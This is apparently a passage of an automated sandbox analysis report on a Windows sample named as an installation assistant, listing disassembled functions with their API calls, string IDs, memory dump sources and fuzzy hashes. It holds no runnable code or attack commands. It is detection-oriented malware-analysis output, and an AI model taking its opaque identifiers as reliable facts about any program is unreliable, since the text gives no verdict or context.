                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction ID: ec02781ed5f56384644495e871a7fb5af7b0b8a3505af5c46922bca9c6262dfc
                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction Fuzzy Hash: 4D41A331605785EFDB199F60C490BEABBE2FF45208F40442EE09A57B51CB716924CF52
                              Function 6C2F85A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID: dU>l$hU>l
                              • API String ID: 269201875-3629098231
                              • Opcode ID: 122def7634e762272b63ccb9a2ac95ad94b9f07d952ac070b00ecd96ad38ef4e
                              • Instruction ID: 23168c1f6a28b378da19d999e0bf0fcb9d8f31df7a40628fcfaab6e164df15f2
                              • Opcode Fuzzy Hash: 122def7634e762272b63ccb9a2ac95ad94b9f07d952ac070b00ecd96ad38ef4e
                              • Instruction Fuzzy Hash: DD11D67514430E8BD3108F6AD480B86F7E4EB0A35DB20442FE9BD9BB80EB71E4468B90
                              Function 6C350906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction ID: 6adef1d21b9740ae71b7a7ef0df02ebba59bef9b3eb487ac08c927fdf8fdb661
                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction Fuzzy Hash: 730184B1E01345DADB10DF9984909AEF7B4FF55308F80842EE569F3A51C3755904CF95
                              Function 6C2FDD28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 6C2FDD49
                              • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C2FA63A,?,00000004,?,4B42FCB6,?,?,6C2EF78C,4B42FCB6,?), ref: 6C2FDD85
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: AllocHeap_free
                              • String ID: 8Q
                              • API String ID: 1080816511-4022487301
                              • Opcode ID: ac437aa8da95046e415f2a7b864f4172c9a95ab66f13f7af1f257e594b201580
                              • Instruction ID: 7e52f3b15559ecf58bfd7a9e70c6a419c14961c69b5f437b1f69f7742c1e00eb
                              • Opcode Fuzzy Hash: ac437aa8da95046e415f2a7b864f4172c9a95ab66f13f7af1f257e594b201580
                              • Instruction Fuzzy Hash: AAF0A43B2C121E669B211E26A840B9AB76C9F83779F154115FD3497E90DB20D403C5F0
                              Function 6C37C5D5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: p/K$J
                              • API String ID: 3519838083-2069324279
                              • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction ID: 784f5ea9a1ac55d5edb44cc31d536ce6088de76734cfc4b733b27ff46ffc8fb6
                              • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction Fuzzy Hash: B001BCB1A117119FD724CF58D5043AAB7F8EF55729F10C81E9092A3B40C7F8A5088FA9
                              Function 6C35AFC7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C35AFCC
                                • Part of subcall function 6C35A4D1: __EH_prolog.LIBCMT ref: 6C35A4D6
                                • Part of subcall function 6C35914B: __EH_prolog.LIBCMT ref: 6C359150
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J
                              • API String ID: 3519838083-2882003284
                              • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction ID: 9e37ab8668aec3f92eaa2391c55e1b57d70f7056388d8c74cfb90ef361522385
                              • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction Fuzzy Hash: 1201F0B1800B50CEC325CF6AC5A468AFBE0BB15308F90C95E80AA57B50D7B8A508CF69
                              Function 6C2E6AAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • AcquireSRWLockExclusive.KERNEL32(6C3E466C,?,?,652EF5AA,6C1B22D8,6C3E430C), ref: 6C2E6AB9
                              • ReleaseSRWLockExclusive.KERNEL32(6C3E466C), ref: 6C2E6AF3
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ExclusiveLock$AcquireRelease
                              • String ID: lF>l
                              • API String ID: 17069307-560091355
                              • Opcode ID: 1c9dff0b1cb00bb58beaee57e2c008d34086bd1d278e34005fc0bb5410e439f9
                              • Instruction ID: 370de1af5ced68b3c14133c1b561eb25c968573893b18dc921ee64b6b705ccc8
                              • Opcode Fuzzy Hash: 1c9dff0b1cb00bb58beaee57e2c008d34086bd1d278e34005fc0bb5410e439f9
                              • Instruction Fuzzy Hash: E5F0E23464012DCFCB106F55C884E55B7B9EB8F339F14422EEE6593B80C7301842CB21
                              Function 6C374E19 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction ID: 2abde9e5aa641fda4db6da792c0fb02c3cc4c63e5208d2f0c3717354d26a660a
                              • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction Fuzzy Hash: 7151C231908309DFCF19DFA0D840ADEB7B5AF0531CF104419E89167E80DB7AA959CF6A
                              Function 6C394F20 Relevance: 5.0, Strings: 4, Instructions: 27COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: (?K$8?K$H?K$CK
                              • API String ID: 0-3450752836
                              • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction ID: 6d920ecb1c848b852fc56dd1dac0aeba431c918125072bcf6ed179fbd0403ee9
                              • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction Fuzzy Hash: DEF030B05017009FC324CF46D54869BF7F4EB45709F50C91EE09A9BB40D3B8A5088FA9